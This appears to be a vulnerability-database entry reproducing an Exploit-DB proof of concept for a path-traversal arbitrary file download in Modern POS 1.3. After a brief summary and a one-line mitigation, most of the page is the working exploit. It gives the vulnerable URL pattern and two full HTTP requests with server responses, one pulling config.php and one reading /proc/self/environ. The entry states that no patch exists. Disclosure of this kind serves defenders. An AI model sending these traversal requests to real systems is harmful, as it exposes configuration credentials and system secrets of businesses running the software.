Modern POS 1.3 - Arbitrary File Download

vendor:

Modern POS

by:

Ihsan Sencan

7.5

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: Modern POS

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE: N/A

CPE: a:itsolution24:modern_pos:1.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2019

Modern POS 1.3 – Arbitrary File Download

Modern POS 1.3 is vulnerable to arbitrary file download. An attacker can exploit this vulnerability by sending a crafted HTTP request to the target server. The request should contain the action parameter set to download and the path parameter set to the file that the attacker wants to download. This vulnerability can be exploited to download sensitive files such as configuration files, which can lead to further attacks.

Mitigation:

The vendor should ensure that the application does not allow users to download arbitrary files.

Source

Exploit-DB raw data:

# Exploit Title: Modern POS 1.3 - Arbitrary File Download
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://itsolution24.com/
# Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
# 

GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../config.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:29:12 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="config.php"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 2920
Content-Type: text/x-php;charset=UTF-8

GET /[PATH]/_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=074b581c124d1caf5df3477995946ea8; cpsession=%3aRoGDGcVEun7oqKs9%2c4760d80be71792470b1f6ebfd8f4c0a5; timezone=Asia/Baghdad
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2019 23:34:27 GMT
Server: Apache
X-Powered-By: PHP/7.2.13
Content-Disposition: attachment; filename="environ"
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 0
Content-Type: inode/x-empty